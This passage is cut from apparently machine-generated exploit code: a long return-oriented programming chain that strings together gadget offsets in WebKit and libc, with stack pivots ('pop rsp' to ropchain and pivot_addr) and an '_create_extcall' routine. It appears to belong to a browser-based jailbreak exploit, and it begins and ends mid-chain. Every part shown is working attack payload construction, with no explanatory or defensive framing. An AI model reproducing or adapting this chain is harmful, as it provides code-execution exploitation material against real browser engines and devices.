db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L439:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+83664, //L443
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+83632, //L441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+83648, //L442
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L440:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L441:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L442:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L443:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+83720, //L445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L445:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+83848, //L447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+83864, //L448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+83832, //L446
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L446:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L447:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L448:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+83960, //L450
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+83944, //L449
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L449:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L450:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+84040, //L451
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L451:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L453:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+84160, //L456
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+84144, //L454
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L454:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L456:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+84304, //L459
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+84272, //L457
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+84288, //L458
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L457:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L458:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L459:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+84376, //L461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L461:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+84432, //L462
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L462:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+84512, //L464
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L464:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L466:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+84632, //L469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+84616, //L467
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L467:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L469:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+84808, //L472
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+84824, //L473
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+84776, //L470
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+84792, //L471
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L470:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L471:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L472:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L473:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+84936, //L474
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+84968, //L476
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+84952, //L475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L474:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L475:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L476:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+85056, //L478
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L478:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+85112, //L479
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L479:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+85184, //L482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L482:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+85240, //L483
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L483:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L485:
libc_base+764760, //pop rsi
ropchain+85328, //L486
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L486:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L488:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+85448, //L491
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+85432, //L489
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L489:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L491:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+85624, //L494
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+85640, //L495
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+85592, //L492
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+85608, //L493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L492:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L493:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L494:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L495:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+85736, //L497
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+85720, //L496
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L496:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L497:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+85824, //L499
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L498:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L499:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+85880, //L500
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L500:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L502:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+85960, //L504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L504:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+74104, //L202
//L235:
libc_base+764760, //pop rsi
ropchain+86056, //L505
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L505:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L507:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+86176, //L510
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+86160, //L508
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L508:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L510:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+86288, //L511
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+86320, //L513
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+86304, //L512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L511:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L512:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L513:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+86424, //L514
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+86440, //L515
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L514:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L515:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+86560, //L516
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+86544, //L517
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L517:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L516:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+86648, //L519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+86632, //L518
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L518:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L519:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+86752, //L520
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+86768, //L521
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L520:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L521:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+86888, //L522
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+86872, //L523
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L523:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L522:
db([0, 0]); // 0x0
//_create_extcall:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+86960, //L525
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L525:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+87024, //L527
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L527:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L528:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L530:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+87192, //L533
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+87176, //L531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L531:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L533:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+87280, //L534
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+87296, //L536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L534:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L536:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L537:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L539:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+87456, //L542
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+87440, //L540
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L540:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L542:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+87600, //L545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+87568, //L543
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+87584, //L544
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L543:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L544:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L545:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+87672, //L547
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L547:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+87728, //L548
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L548:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+87824, //L551
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L550:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L551:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L552:
db([1, 0]); // 0x1
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+87920, //L553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+87936, //L554
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L553:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L554:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+88024, //L556
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L556:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+88080, //L557
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L557:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+88184, //L559
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L559:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L561:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+88304, //L564
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+88288, //L562
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L562:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L564:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+88448, //L567
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+88416, //L565
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+88432, //L566
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L565:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L566:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L567:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+88520, //L569
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L569:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+88576, //L570
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L570:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+88672, //L573
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L572:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L573:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L574:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+88768, //L575
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+88784, //L576
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L575:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L576:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+88872, //L578
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L578:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+88928, //L579
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L579:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+89000, //L582
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L582:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+89056, //L583
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L583:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L585:
pivot_addr,
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+89192, //L586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L586:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L588:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+89312, //L591
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+89296, //L589
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L589:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L591:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+89456, //L594
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+89424, //L592
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+89440, //L593
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L592:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L593:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L594:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
